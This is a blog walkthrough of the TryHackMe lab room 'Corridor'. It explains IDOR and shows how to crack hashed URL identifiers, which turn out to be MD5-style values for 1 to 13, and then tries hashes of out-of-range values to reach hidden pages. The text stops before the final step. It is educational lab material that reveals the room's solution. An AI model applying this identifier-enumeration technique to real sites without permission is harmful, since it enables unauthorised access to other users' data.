TryHackMe | Corridor

In this blog, I will try to show and explain the TryHackMe room Corridor. This room explores potential IDOR vulnerabilities in a web application.

What is IDOR Vulnerability?

When an application makes use of user-supplied input to access objects directly, it opens itself up to the risk of IDOR, a kind of access control vulnerability. The word “IDOR” became widely known when it was included in the OWASP Top Ten for 2007. However, this is only one example of the numerous potential blunders in implementing access restrictions that might lead to such bypasses. IDOR vulnerabilities may develop in the context of either horizontal or vertical privilege escalation.

Reference: IDOR

Solution

The prompt to the problem says –

From this, we can think of the following things –

The vulnerability that we are looking for is IDOR
The URL endpoints hold significant meaning. Maybe, hexadecimal values, which may turn out to be hash.

Let us visit the URL –

We find the above page, where each of the doors is hyperlinked with different URLs. Going to each of the URLs, we get the following –

All the URLs have the above image. Now, coming back to the main page and looking into the page source we get –

We can see that all the URL endpoints are similar in length and are hexadecimal values. Now, from our second assumption, we can say that it may be a hash. Going to this website we try to crack the ‘probable’ hash values.

We found the first one. Now, try the rest of the values –

We can see that the values are from 1 to 13. Now, from the first assumption, it may be IDOR vulnerability. Let us try 2 values. 0 and 14. Firstly, let us convert the 2 values.